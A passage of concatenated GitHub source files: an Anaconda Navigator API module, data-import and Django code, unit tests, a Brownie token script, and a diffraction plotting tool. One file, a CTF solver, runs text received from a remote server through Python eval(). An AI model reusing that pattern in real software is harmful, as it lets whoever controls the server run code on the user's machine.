repodata_urls = self._set_repo_urls_from_channels(norm_channels)\n self._check_repos(repodata_urls)\n\n def update_metadata(self):\n \"\"\"\n Update the metadata available for packages in repo.continuum.io.\n\n Returns a download worker.\n \"\"\"\n # TODO: there needs to be an uniform way to query the metadata for\n # both repo and anaconda.org\n if self._data_directory is None:\n raise Exception('Need to call `api.set_data_directory` first.')\n\n metadata_url = 'https://repo.continuum.io/pkgs/metadata.json'\n filepath = os.sep.join([self._data_directory, 'metadata.json'])\n worker = self.download(metadata_url, filepath)\n return worker\n\n def check_valid_channel(self,\n channel,\n conda_url='https://conda.anaconda.org'):\n \"\"\"Check if channel is valid.\"\"\"\n if channel.startswith('https://') or channel.startswith('http://'):\n url = channel\n else:\n url = \"{0}/{1}\".format(conda_url, channel)\n\n if url[-1] == '/':\n url = url[:-1]\n plat = self.conda_platform()\n repodata_url = \"{0}/{1}/{2}\".format(url, plat, 'repodata.json')\n worker = self.download_is_valid_url(repodata_url)\n worker.url = url\n return worker\n\n def process_apps(self, apps, prefix=None):\n \"\"\"Process app information.\"\"\"\n # TODO: This also needs to check installed apps in the prefix\n applications = {}\n if prefix is None:\n prefix = self.ROOT_PREFIX\n\n # Temporal hardcoded images\n image_paths = {\n 'glueviz': images.GLUEVIZ_ICON_1024_PATH,\n 'spyder-app': images.SPYDER_ICON_1024_PATH,\n 'spyder': images.SPYDER_ICON_1024_PATH,\n 'ipython-qtconsole': images.IPYTHON_QTCONSOLE_ICON_1024_PATH,\n 'qtconsole': images.IPYTHON_QTCONSOLE_ICON_1024_PATH,\n 'ipython-notebook': images.IPYTHON_NOTEBOOK_ICON_1024_PATH,\n 'notebook': images.NOTEBOOK_ICON_1024_PATH,\n 'orange-app': images.ORANGE_ICON_1024_PATH,\n 'rodeo': images.RODEO_ICON_1024_PATH,\n 'veusz': images.VEUSZ_ICON_1024_PATH}\n\n APPS_DESCRIPTIONS = {\n 'glueviz': 'Multidimensional data visualization across files. '\n 'Explore relationships within and among related '\n 'datasets.',\n 'notebook': 'Web-based, interactive computing notebook '\n 'environment. Edit and run human-readable docs while '\n 'describing the data analysis.',\n 'orange-app': 'Component based data mining framework. Data '\n 'visualization and data analysis for novice and '\n 'expert. Interactive workflows with a large '\n 'toolbox.',\n 'qtconsole': 'PyQt GUI that supports inline figures, proper '\n 'multiline editing with syntax highlighting, '\n 'graphical calltips, and more.',\n 'spyder': 'Scientific PYthon Development EnviRonment. Powerful '\n 'Python IDE with advanced editing, interactive '\n 'testing, debugging and introspection features',\n 'rodeo': 'A browser-based IDE for data science with python. '\n 'Includes autocomplete, syntax highlighting, IPython '\n 'support.',\n 'dataportal': 'Interactive exploration of larger-than-memory '\n 'datasets. Create data sources, perform '\n 'transformations and combinations, and visualise.',\n 'veusz': 'Veusz is a GUI scientific plotting and graphing '\n 'package. It is designed to produce publication-ready '\n 'Postscript or PDF output.'\n }\n APPS_DESCRIPTIONS['anaconda-mosaic'] = APPS_DESCRIPTIONS['dataportal']\n\n invalid_apps = ['spyder-app', 'ipython-qtconsole', 'ipython-notebook']\n\n for app_name in apps:\n if app_name in invalid_apps:\n continue\n\n data = apps[app_name]\n versions = data.get('versions')\n description = APPS_DESCRIPTIONS.get(app_name,\n data.get('description', ''))\n version = versions[-1] # Versions are sorted from small to big\n image_path = image_paths.get(app_name,\n images.ANACONDA_ICON_512_PATH)\n app_entry = data.get('app_entry').get(version, '')\n\n # Handle deprecated entrypoints for notebook and qtconsole\n if 'ipython notebook' in app_entry.lower():\n app_entry = app_entry.replace('ipython notebook',\n 'jupyter-notebook')\n elif 'ipython qtconsole' in app_entry.lower():\n app_entry = app_entry.replace('ipython qtconsole',\n 'jupyter-qtconsole')\n\n application = dict(name=app_name,\n description=description,\n versions=versions,\n command=app_entry,\n image_path=image_path)\n applications[app_name] = application\n\n return applications\n\n # --- New moved API\n # -------------------------------------------------------------------------\n @property\n def channels(self):\n \"\"\"Convenience property for returning conda rc channels.\"\"\"\n return list(self.conda_get_condarc_channels())\n\n @property\n def active_channels(self):\n \"\"\"Convenience property for returning active channels.\"\"\"\n active_channels = self.config.get('main', 'conda_active_channels')\n if active_channels is None or not active_channels:\n active_channels = self.channels\n return active_channels\n\n @property\n def active_normalized_channels(self):\n \"\"\"Convenience property for returning active normalized channels.\"\"\"\n return self.conda_get_condarc_channels(\n channels=self.active_channels,\n normalize=True)\n\n @property\n def user_dynamic_channels(self):\n \"\"\"\n Return normalized list of logged user channels.\n\n These are the channels that are located at anaconda server (cloud),\n as opposed to the repo.continuum ones.\n\n FIXME: This method is flawed as defaults could also include logged\n channels.\n \"\"\"\n channels = []\n condarc_channels = self._conda_api.get_condarc_channels()\n\n for ch in condarc_channels:\n if ('repo.continuum' not in ch and ch != 'defaults' and\n '/t/' not in ch):\n channels.append(ch)\n\n channels = [ch for ch in channels if ch in self.active_channels]\n return channels\n\n @property\n def environments(self):\n \"\"\"\n Return an ordered dictionary of all existing named environments.\n\n The dictionary includes the root environment as the first entry.\n \"\"\"\n environments = OrderedDict()\n environments_prefix = sorted(self.conda_get_envs(log=False))\n environments['root'] = self.ROOT_PREFIX\n\n for prefix in environments_prefix:\n name = os.path.basename(prefix)\n environments[name] = prefix\n\n return environments\n\n\nANACONDA_API = None\n\n\ndef AnacondaAPI():\n \"\"\"Manager API threaded worker.\"\"\"\n global ANACONDA_API\n\n if ANACONDA_API is None:\n ANACONDA_API = _AnacondaAPI()\n\n return ANACONDA_API\n\n\n# --- Local testing\n# -----------------------------------------------------------------------------\ndef finished(worker, output, error): # pragma: no cover\n \"\"\"Print information on test finished.\"\"\"\n print(worker, output, error)\n\n\ndef download_finished(url, path): # pragma: no cover\n \"\"\"Print information on downlaod finished.\"\"\"\n print(url, path)\n\n\ndef repodata_updated(repos): # pragma: no cover\n \"\"\"Print information on repodata updated.\"\"\"\n print(repos)\n\n\ndef test(): # pragma: no cover\n \"\"\"Main local test.\"\"\"\n from anaconda_navigator.utils.qthelpers import qapplication\n\n app = qapplication()\n api = AnacondaAPI()\n api.sig_repodata_updated.connect(repodata_updated)\n data_directory = tempfile.mkdtemp()\n api.set_data_directory(data_directory)\n worker = api.update_metadata()\n worker.sig_download_finished.connect(download_finished)\n api.update_repodata()\n app.exec_()\n\n\nif __name__ == '__main__': # pragma: no cover\n test()\n","repo_name":"tsukudamayo/python","sub_path":"src/py35/site-packages/anaconda_navigator/api/anaconda_api.py","file_name":"anaconda_api.py","file_ext":"py","file_size_in_byte":18039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"29045646579","text":"import pandas as pd\n\n\ndef get_municipi(data):\n return data.split(\"(\")[0].strip()\n\n\ndef get_codi_postal(data):\n if len(data.split(\"(\")) > 1:\n cod_p = data.split(\"(\")[1]\n result = cod_p[:-1]\n else:\n result = None\n return result\n\n\ndef remove_nan(data):\n if not isinstance(data, str):\n return \"\"\n else:\n return data\n\ndef remove_nan_list(data):\n if not isinstance(data, list):\n return []\n else:\n return data\n\n\ndef get_department(data):\n return data.split(\"\\\\\")[0]\n\n\n# Main gather function\ndef read_data_from_xlsx(file):\n columns = {'Num ens': 'Num ens', 'Província': 'Província', 'Municipi': 'Municipi', 'Via': 'Via',\n 'Núm. via': 'Núm. via', 'Nom': 'Nom','Tipus ús': 'Tipus ús',\n 'Nif resp. fiscal efectiu': 'Nif resp. fiscal efectiu',\n 'Responsable fiscal efectiu': 'Responsable fiscal efectiu',\n 'Sup. const. sobre rasant': 'Sup. const. sobre rasant',\n 'Sup. const. sota rasant': 'Sup. const. sota rasant',\n 'Sup. construïda total': 'Sup. construïda total', 'Sup. del terreny': 'Sup. del terreny',\n 'Component X': 'Component X', 'Component Y': 'Component Y', 'Ref. Cadastral': 'Ref. Cadastral',\n 'Classificació del sòl': 'Classificació del sòl'}\n df = pd.read_excel(file, dtype=str)\n df.rename(columns=columns, inplace=True)\n df.set_index(\"Num ens\", inplace=True)\n\n df['Tipus ús'] = df['Tipus ús'].apply(remove_nan).apply(lambda x: str(x.split(\",\")) if len(x.split(\",\")) > 1 else str([x]))\n\n # df[\"Codi_postal\"] = df[\"Municipi\"].apply(get_codi_postal)\n #df[\"Municipi\"] = df[\"Municipi\"].apply(get_municipi)\n df[\"Responsable fiscal efectiu\"] = df[\"Responsable fiscal efectiu\"].apply(remove_nan).apply(get_department)\n if \"Classificació del sòl\" in df.columns:\n df[\"Classificació del sòl\"] = df[\"Classificació del sòl\"].apply(remove_nan)\n df[\"Ref. Cadastral\"] = df[\"Ref. Cadastral\"].apply(remove_nan)\n df.reset_index(inplace=True)\n return df.to_dict(\"records\")\n","repo_name":"biggproject/Harmonizer","sub_path":"Harmonizer_Cimne/sources/GPG/gather/GPG_gather.py","file_name":"GPG_gather.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"ca","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"13210202922","text":"from unittest import TestCase\nimport game_template.model.rpg_world as model\nimport logging\n\nclass TestLevelBuilder(TestCase):\n def test_initialise(self):\n\n logging.basicConfig(level=logging.INFO)\n\n levels = model.LevelBuilder()\n levels.initialise()\n\n self.fail()\n\n def test_load_levels(self):\n\n logging.basicConfig(level=logging.INFO)\n\n floors = model.FloorBuilder()\n floors.initialise()\n\n levels = model.LevelBuilder()\n levels.initialise(floors)\n\n for level in levels.levels.values():\n print(str(level)+\"\\n\")\n\n self.fail()\n\n def test_build_levels(self):\n self.fail()\n","repo_name":"kwoolter/Tower2","sub_path":"game_template/model/test_levelBuilder.py","file_name":"test_levelBuilder.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"36477462999","text":"import brownie\nimport json\n\nfrom brownie import MyToken\n\n# Set the addresses for the Pantos forwarder, hub, and PAN token\n# can be found here: https://pantos.gitbook.io/technical-documentation/general/deploying-token#overview-of-pantos-blockchain-ids-and-contract-addresses\nHUB_ADDRESS = \"\"\n\n# this is the token address you want to unregister\nTOKEN_ADDRESS = \"\"\n\n# Define the deployToken function\ndef unregister_token(account_name: str):\n # loading Pantos Hub abi data\n with open('./abi/pantos_hub_abi.json', 'r') as f:\n pantos_hub_abi_data = json.loads(f.read())\n\n # Load the PantosHub contract from the ABI\n hub = brownie.Contract.from_abi(\"PantosHub\", HUB_ADDRESS,\n pantos_hub_abi_data['abi'])\n\n account = brownie.accounts.load(account_name)\n\n # unregister the custom token on the PantosHub\n hub.unregisterToken(TOKEN_ADDRESS,\n {'from': account})\n","repo_name":"kurzi2704/pantos-pandas-creator","sub_path":"scripts/unregister_token.py","file_name":"unregister_token.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"27111980428","text":"from sympy import *\r\nimport socket\r\nimport time\r\n\r\n# Creates and connects to the socket that is hosting the challenge\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((\"34.148.151.228\", 9000))\r\n# Receive the data from the socket and then convert it to a string\r\ndata = s.recv(1024)\r\nstringSocket = data.decode('utf-8') \r\n# Print out the data received from the socket so you can see what is happening\r\nprint(stringSocket)\r\n# Skip to position 331 in the string since that was the fixed length at the beginning without an equation\r\nstringIndex = 162\r\n\r\n# Set an arbitrary high number to loop through\r\nfor i in range(100):\r\n # Initate a boolean for the while loop and a string to store the equation before the equal sign\r\n randomVal = true\r\n stringEquation = ''\r\n while randomVal:\r\n # Takes the character at the stringIndex and sees if it is an equals sign or a new line, if it isn't adds it to the string\r\n tempChar = stringSocket[stringIndex]\r\n stringIndex = stringIndex + 1\r\n if tempChar == '=':\r\n randomVal = false\r\n elif tempChar == '\\n':\r\n randomVal = false\r\n else: \r\n stringEquation = stringEquation + tempChar\r\n \r\n # Use sympy to parse the strings before and after the equal signs into equations that sympy can use\r\n print(\"hi\" + stringEquation)\r\n eq1 = eval(stringEquation)\r\n print(eq1)\r\n # Convert the int to the string for easier printing and encoding\r\n numString = str(eq1) + \"\\n\"\r\n # Sends the correct answer encoded back to the server\r\n s.send(str.encode(numString))\r\n # Prints the value sent to the server so you can see what is happening\r\n print(numString)\r\n # Grab the new data and convert it into a string\r\n newData = s.recv(1024)\r\n stringSocket = newData.decode('utf-8') \r\n # Print the string so you know what is going on\r\n print(stringSocket)\r\n # Sets the stringIndex back to one as the new data is only the new equation\r\n stringIndex = 8\r\n","repo_name":"Matilda12390/Sekai-CTF-Writeups","sub_path":"Eval Me/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"31232584301","text":"from .models import Category, Product, Banner\nfrom rest_framework import serializers\n\n\nclass CategorySerializer(serializers.ModelSerializer):\n class Meta:\n model = Category\n fields = ['id', 'title', 'parent_category_id', 'created_at', 'updated_at']\n\n\nclass ProductSerializer(serializers.ModelSerializer):\n image = serializers.FileField(max_length=100, use_url=True)\n class Meta:\n model = Product\n fields = ['id','seller','user', 'title','name','category','image','price','discount','quantity','stock','available','description','created_at', 'updated_at']\n def create(self, validated_data):\n image=validated_data.pop('image')\n for img in image:\n image=Product.objects.create(image=img,**validated_data)\n return image\n \n\nclass BannerSerializer(serializers.ModelSerializer):\n image1 = serializers.ImageField(max_length=100, use_url=True)\n image2 = serializers.ImageField(max_length=100, use_url=True)\n image3 = serializers.ImageField(max_length=100, use_url=True)\n class Meta:\n model=Banner\n fields=[\"image1\",\"image2\",\"image3\"]\n # def create(self, validated_data):\n # image=validated_data.pop('image1')\n # for img in image:\n # image=Banner.objects.create(image=img,**validated_data)\n # return image\n\n \n\n# from django.contrib.auth.models import User\nfrom django.contrib.auth import get_user_model\nUser = get_user_model()\nfrom .models import Category, Product\nfrom drf_extra_fields.fields import Base64ImageField\n\n\nclass ProductDetailSerializer(serializers.ModelSerializer):\n seller = serializers.SlugRelatedField(slug_field=\"username\", queryset=User.objects)\n category = serializers.SerializerMethodField()\n image = Base64ImageField()\n\n def get_category(self, obj):\n return obj.category.name\n\n class Meta:\n model = Product\n exclude = \"modified\"","repo_name":"Naresh8722/Naresh8722","sub_path":"products/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37567184687","text":"import collections\nimport sys\nimport heapq\n\ninput = sys.stdin.readline\n\n\ndef inp():\n return (int(input()))\ndef inlt():\n return (list(map(int, input().split())))\ndef insr():\n s = input()\n return (list(s[:len(s) - 1]))\ndef invr():\n return (map(int, input().split()))\n\n\ndef solution():\n n = inp()\n strength = inlt()\n weaker = 1\n Monte = strength[0]\n for i in range(1, n):\n if strength[i] < Monte:\n weaker += 1\n res = 1\n while n & weaker == 0:\n n = n >> 1\n res = res << 1\n print(res)\n return\n\n\nif __name__ == '__main__':\n t = 1\n for i in range(t):\n solution()\n","repo_name":"cybsbbb/codeforces_practice","sub_path":"contests/UCRPC_F23/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"41759528169","text":"#!/usr/bin/env python3\ndef balance(initial=100, *operations, cashback):\n '''Рассчитывает баланс.\n\n Считает текущий баланс с учетом сумм операций и кешбека.'''\n balance = initial\n for operation in operations:\n balance -= operation\n balance += cashback\n print(balance)\n\nbalance(1000, 300, 2, 34, 29, 100, cashback=300)\n#прочитаем строку документации функции balance атрибутом __doc__\nprint(balance.__doc__)\n#функция help считывает атрибут __doc__ соответствующей функции \n# и аккуратно выводит его на экран\nhelp(balance)","repo_name":"nicklada/pythonCourse","sub_path":"Functions/10.10.doc.py","file_name":"10.10.doc.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"18712517391","text":"import unittest\nfrom app import create_app, db\nfrom app.models import *\nfrom config import Config\nimport HtmlTestRunner\n\nclass TestConfig(Config):\n TESTING = True\n SQLALCHEMY_DATABASE_URI = 'sqlite://'\n\n\nclass UserModelCase(unittest.TestCase):\n def setUp(self):\n self.app = create_app(TestConfig)\n self.app_context = self.app.app_context()\n self.app_context.push()\n db.create_all()\n\n def tearDown(self):\n db.session.remove()\n db.drop_all()\n self.app_context.pop()\n\n def test_password_hashing(self):\n u = User(username='susan')\n u.set_password('cat')\n self.assertFalse(u.check_password('dog'))\n self.assertTrue(u.check_password('cat'))\n\n def test_user_row(self):\n u = User(username = \"hello\", email = \"whatever@gmail.com\")\n u.set_password('hello')\n db.session.add(u)\n db.session.commit()\n tmp = u.id\n p = User.query.filter_by(id = tmp).first()\n self.assertEqual(p.username, \"hello\")\n self.assertEqual(p.email, \"whatever@gmail.com\")\n self.assertTrue(p.check_password('hello'))\n self.assertFalse(p.check_password('hell'))\n\nclass FacultyCase(unittest.TestCase):\n def setUp(self):\n self.app = create_app(TestConfig)\n self.app_context = self.app.app_context()\n self.app_context.push()\n db.create_all()\n\n def tearDown(self):\n db.session.remove()\n db.drop_all()\n self.app_context.pop()\n\n def test_add_faculty_details(self):\n f = FacultyDetails(fac_id = \"CSE333\", name = \"venkat\", designation = \"Prof\", department = \"CSE\")\n db.session.add(f)\n db.session.commit()\n p = FacultyDetails.query.filter_by(id = f.id).first()\n self.assertEqual(p.name, \"venkat\")\n self.assertEqual(p.designation, \"Prof\")\n\n def test_add_faculty(self):\n f = FacultyDetails(fac_id = \"CSE333\", name = \"venkat\", designation = \"Prof\", department = \"CSE\")\n db.session.add(f)\n db.session.commit()\n\n g = Faculty(fac_id = \"CSE333\", user_id = f.fac_id, elective_id = \"None\")\n db.session.add(g)\n db.session.commit()\n\n querystring = \"Select * from faculty, faculty_details where faculty.fac_id = faculty_details.fac_id\"\n res = db.engine.execute(querystring)\n\n for row in res:\n self.assertEqual(row[7], \"Prof\")\n self.assertEqual(row[6], \"venkat\")\n \n\nclass StudentCase(unittest.TestCase):\n def setUp(self):\n self.app = create_app(TestConfig)\n self.app_context = self.app.app_context()\n self.app_context.push()\n db.create_all()\n\n def tearDown(self):\n db.session.remove()\n db.drop_all()\n self.app_context.pop()\n\n def test_add_student_details(self):\n s = StudentDetails(roll_no = \"CSE17001\", name = \"Shreya\", batch=\"2020\",section=\"A\", department = \"CSE\")\n db.session.add(s)\n db.session.commit()\n p = StudentDetails.query.filter_by(id = s.id).first()\n self.assertEqual(p.name, \"Shreya\")\n self.assertEqual(p.roll_no, \"CSE17001\")\n\n def test_add_student(self):\n s = StudentDetails(roll_no = \"CSE17001\", name = \"Shreya\", batch=\"2020\",section=\"A\", department = \"CSE\")\n db.session.add(s)\n db.session.commit()\n\n g = Student(roll_number = \"CSE17001\", user_id = s.roll_no,name=\"Shreya\", elective_id1 = \"None\", elective_id2 = \"None\", elective_id3 = \"None\",allotted_elective=\"None\",random_elective=\"None\")\n db.session.add(g)\n db.session.commit()\n\n querystring = \"Select * from student, student_details where student.roll_number = student_details.roll_no\"\n res = db.engine.execute(querystring)\n\n for row in res:\n self.assertEqual(row[3], \"CSE17001\")\n self.assertEqual(row[11], \"Shreya\")\n\nclass InitialElectiveListCase(unittest.TestCase):\n def setUp(self):\n self.app = create_app(TestConfig)\n self.app_context = self.app.app_context()\n self.app_context.push()\n db.create_all()\n\n def tearDown(self):\n db.session.remove()\n db.drop_all()\n self.app_context.pop()\n\n def test_initial_elective_list(self):\n i = InitialElectiveList(electiveID = \"CSE387\",electiveName=\"OpenLab\",electiveDescription=\"OpenLab Description\")\n db.session.add(i)\n db.session.commit()\n p = InitialElectiveList.query.filter_by(id = i.id).first()\n self.assertEqual(p.electiveID, \"CSE387\")\n self.assertEqual(p.electiveName, \"OpenLab\")\n\n def test_initial_elective_list_check(self):\n f = FacultyDetails(fac_id = \"CSE333\", name = \"venkat\", designation = \"Prof\", department = \"CSE\")\n db.session.add(f)\n db.session.commit()\n\n i = InitialElectiveList(electiveID = \"CSE387\",electiveName=\"OpenLab\",electiveDescription=\"OpenLab Description\")\n db.session.add(i)\n db.session.commit()\n\n querystring = \"Select * from faculty, initial_elective_list where faculty.elective_id = initial_elective_list.electiveID\"\n res = db.engine.execute(querystring)\n\n for row in res:\n self.assertEqual(row[3], \"CSE387\")\n self.assertEqual(row[6], \"OpenLab\")\n\nclass ElectiveListv2Case(unittest.TestCase):\n def setUp(self):\n self.app = create_app(TestConfig)\n self.app_context = self.app.app_context()\n self.app_context.push()\n db.create_all()\n\n def tearDown(self):\n db.session.remove()\n db.drop_all()\n self.app_context.pop()\n\n def test_elective_listv2(self):\n e = ElectiveListv2(electiveID = \"CSE312\",electiveName=\"Pattern Recognition\",electiveDescription=\"Pattern Recognition Details\")\n db.session.add(e)\n db.session.commit()\n p = ElectiveListv2.query.filter_by(id = e.id).first()\n self.assertEqual(p.electiveID, \"CSE312\")\n self.assertEqual(p.electiveName, \"Pattern Recognition\")\n\n def test_elective_listv2_check(self):\n s = StudentDetails(roll_no = \"CSE17001\", name = \"Shreya\", batch=\"2020\",section=\"A\", department = \"CSE\")\n db.session.add(s)\n db.session.commit()\n\n e = ElectiveListv2(electiveID = \"CSE312\",electiveName=\"Pattern Recognition\",electiveDescription=\"Pattern Recognition Details\")\n db.session.add(e)\n db.session.commit()\n\n querystring = \"Select * from student, elective_listv2 where student.elective_id1 = elective_listv2.electiveID or student.elective_id2 = elective_listv2.electiveID or student.elective_id3 = elective_listv2.electiveID\"\n res = db.engine.execute(querystring)\n\n for row in res:\n self.assertEqual(row[4], \"CSE312\")\n self.assertEqual(row[11], \"Pattern Recognition\")\n\n\nif __name__ == '__main__':\n # unittest.main(verbosity=2)\n unittest.main(testRunner=HtmlTestRunner.HTMLTestRunner(output = \"unit_reports\", combine_reports = True))","repo_name":"RamNewton/Eligere-Elective-Management-System","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":6950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"6254288114","text":"import os\r\nfrom intro import intro\r\nfrom insured import Insured\r\n\r\ndef management():\r\n \r\n print(intro)\r\n \r\n print(\"--> Evidence pojištěných <--\\n\")\r\n print(\"Vyberte si akci:\")\r\n print(\"\\t1 - Přidat nového pojištěného\")\r\n print(\"\\t2 - Vypsat všechny pojištěné\")\r\n print(\"\\t3 - Vyhledat pojištěného\")\r\n print(\"\\t4 - Konec\")\r\n \r\n option = input(\"Zadání: \")\r\n \r\n # Vložení nového pojištěnce na základě jeho unikátního ID nebo jakéhokoli\r\n # unikátního registračního čísla\r\n if option == \"1\":\r\n os.system('cls')\r\n new_insured = Insured()\r\n Insured.data_insured[new_insured.reg_no] = new_insured\r\n \r\n # Výpis všech pojištěných\r\n elif option == \"2\":\r\n if Insured.data_insured:\r\n os.system('cls')\r\n print(\"Celkový počet pojištěných.\", Insured.get_all_insurance())\r\n print(\"\\nVýpis s detaily pojištěnců\")\r\n for i, insured in enumerate(Insured.data_insured.values()):\r\n print(\"Pojištěnec - \", i + 1)\r\n insured.get_insured()\r\n print()\r\n else:\r\n print(\"Žádná data nejsou v evidenci\")\r\n \r\n # Vyhledání pojištěného podle ID nebo registrační čísla\r\n elif option == \"3\":\r\n os.system('cls')\r\n reg_no = input(\"\\nZadejte ID pojištěného: \")\r\n try:\r\n Insured.data_insured[reg_no].get_insured()\r\n except:\r\n print(\"Zadané ID neevidujeme.\")\r\n \r\n # Ukončení programu\r\n elif option == \"4\":\r\n os.system('cls')\r\n exit()","repo_name":"SonicRJ/python_insurance_company","sub_path":"management.py","file_name":"management.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"cs","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20114026052","text":"import sys\nimport os\nimport argparse\n\nfrom shutil import copyfile\n\nimport numpy as np\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.transforms as transforms\n\nfrom scipy.interpolate import interp1d\n\nimport math\n\n__version__ = '2.0.1'\n\nparams = {'legend.fontsize': 10,\n 'legend.labelspacing': 0.1}\nplt.rcParams.update(params)\n\nLINESDIR = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))\n\nplanck_constant = 6.62606957E-34\nelementary_charge = 1.60217656E-19\nspeed_of_light = 2.99792458E8\n\niza_codes = [\"ABW\", \"ACO\", \"AEI\", \"AEL\", \"AEN\", \"AET\", \"AFG\", \"AFI\", \"AFN\",\n \"AFO\", \"AFR\", \"AFS\", \"AFT\", \"AFV\", \"AFX\", \"AFY\", \"AHT\", \"ANA\",\n \"APC\", \"APD\", \"AST\", \"ASV\", \"ATN\", \"ATO\", \"ATS\", \"ATT\", \"ATV\",\n \"AVL\", \"AWO\", \"AWW\", \"BCT\", \"BEA\", \"BEC\", \"BIK\", \"BOF\", \"BOG\",\n \"BOZ\", \"BPH\", \"BRE\", \"BSV\", \"CAN\", \"CAS\", \"CDO\", \"CFI\", \"CGF\",\n \"CGS\", \"CHA\", \"CHI\", \"CLO\", \"CON\", \"CSV\", \"CZP\", \"DAC\", \"DDR\",\n \"DFO\", \"DFT\", \"DOH\", \"DON\", \"EAB\", \"EDI\", \"EEI\", \"EMT\", \"EON\",\n \"EPI\", \"ERI\", \"ESV\", \"ETR\", \"EUO\", \"EWT\", \"EZT\", \"FAR\", \"FAU\",\n \"FER\", \"FRA\", \"GIS\", \"GIU\", \"GME\", \"GON\", \"GOO\", \"HEU\", \"IFO\",\n \"IFR\", \"IFW\", \"IFY\", \"IHW\", \"IMF\", \"IRN\", \"IRR\", \"IRY\", \"ISV\",\n \"ITE\", \"ITG\", \"ITH\", \"ITN\", \"ITR\", \"ITT\", \"ITV\", \"ITW\", \"IWR\",\n \"IWS\", \"IWV\", \"IWW\", \"JBW\", \"JNT\", \"JOZ\", \"JRY\", \"JSN\", \"JSR\",\n \"JST\", \"JSW\", \"KFI\", \"LAU\", \"LEV\", \"LIO\", \"LIT\", \"LOS\", \"LOV\",\n \"LTA\", \"LTF\", \"LTJ\", \"LTL\", \"LTN\", \"MAR\", \"MAZ\", \"MEI\", \"MEL\",\n \"MEP\", \"MER\", \"MFI\", \"MFS\", \"MON\", \"MOR\", \"MOZ\", \"MRE\", \"MSE\",\n \"MSO\", \"MTF\", \"MTN\", \"MTT\", \"MTW\", \"MVY\", \"MWW\", \"NAB\", \"NAT\",\n \"NES\", \"NON\", \"NPO\", \"NPT\", \"NSI\", \"OBW\", \"OFF\", \"OKO\", \"OSI\",\n \"OSO\", \"OWE\", \"PAR\", \"PAU\", \"PCR\", \"PHI\", \"PON\", \"POS\", \"PSI\",\n \"PUN\", \"RHO\", \"RON\", \"RRO\", \"RSN\", \"RTE\", \"RTH\", \"RUT\", \"RWR\",\n \"RWY\", \"SAF\", \"SAO\", \"SAS\", \"SAT\", \"SAV\", \"SBE\", \"SBN\", \"SBS\",\n \"SBT\", \"SEW\", \"SFE\", \"SFF\", \"SFG\", \"SFH\", \"SFN\", \"SFO\", \"SFS\",\n \"SFV\", \"SFW\", \"SGT\", \"SIV\", \"SOD\", \"SOF\", \"SOS\", \"SSF\", \"SSO\",\n \"SSY\", \"STF\", \"STI\", \"STO\", \"STT\", \"STW\", \"SVR\", \"SVV\", \"SZR\",\n \"TER\", \"THO\", \"TOL\", \"TON\", \"TSC\", \"TUN\", \"UEI\", \"UFI\", \"UOS\",\n \"UOV\", \"UOZ\", \"USI\", \"UTL\", \"UWY\", \"VET\", \"VFI\", \"VNI\", \"VSV\",\n \"WEI\", \"WEN\", \"YUG\", \"ZON\"] # updated dec 2015\n\n\ndef lineno():\n \"\"\"Returns the current line number in our program.\"\"\"\n import inspect\n return inspect.currentframe().f_back.f_lineno\n\n\ndef printer(data):\n \"\"\"Print things to stdout on one line dynamically\"\"\"\n sys.stdout.write(\"\\r\\x1b[K\"+data.__str__())\n sys.stdout.flush()\n\n\ndef gen_read_files(paths):\n \"\"\"opens file, returns file object for reading\"\"\"\n for path in paths:\n try:\n f = open(path)\n except OSError as e:\n print(e)\n # print 'Cannot open {} (IOError)'.format(path,e)\n exit(0)\n yield f\n\n\ndef read_file(path):\n \"\"\"opens file, returns file object for reading\"\"\"\n try:\n f = open(path)\n except OSError as e:\n print(e)\n # print 'Cannot open {} (IOError)'.format(path,e)\n exit(0)\n return f\n\n\ndef read_data(fn, usecols=None, append_zeros=False, savenpy=False, suffix='', is_ticks=False, wl=1.0):\n if fn == 'stepco.inp':\n f = read_file(fn)\n return parse_xrs(f, return_as='d')\n\n root, ext = os.path.splitext(fn)\n\n if ext == '' and root.upper() in iza_codes:\n fn = parse_iza_code(code=root)\n return read_data(fn, wl=wl)\n\n if ext == '.cif':\n fn = run_cif2xy(fn, wl=wl) # requires CCTBX and FOCUS\n return read_data(fn)\n\n if ext.lower() == '.xrdml':\n return parse_xrdml(fn)\n\n try:\n inp = np.load(root+'.npy')\n except (OSError, AssertionError):\n inp = np.loadtxt(fn, usecols=usecols, ndmin=2)\n else:\n ext = '.npy'\n fn = root+'.npy'\n\n if append_zeros:\n (i, j) = inp.shape\n inp = np.hstack((inp, np.zeros((i, 1))))\n\n if inp.shape[1] > 3:\n print(f'More than 3 columns read from {f.name}, assuming x,y,esd, ignoring the rest.')\n\n d = Data(inp, name=fn+suffix, is_ticks=is_ticks)\n\n if savenpy and ext != '.npy':\n np.save(root, inp)\n\n return d\n\n\ndef load_tick_marks(path, col=3):\n \"\"\"Checks if file exists and loads tick mark data as data class. Use column=3 default for xrs\"\"\"\n try:\n f = open(path)\n f.close()\n except OSError:\n print(f'-- {path} not found. (IOError)')\n return 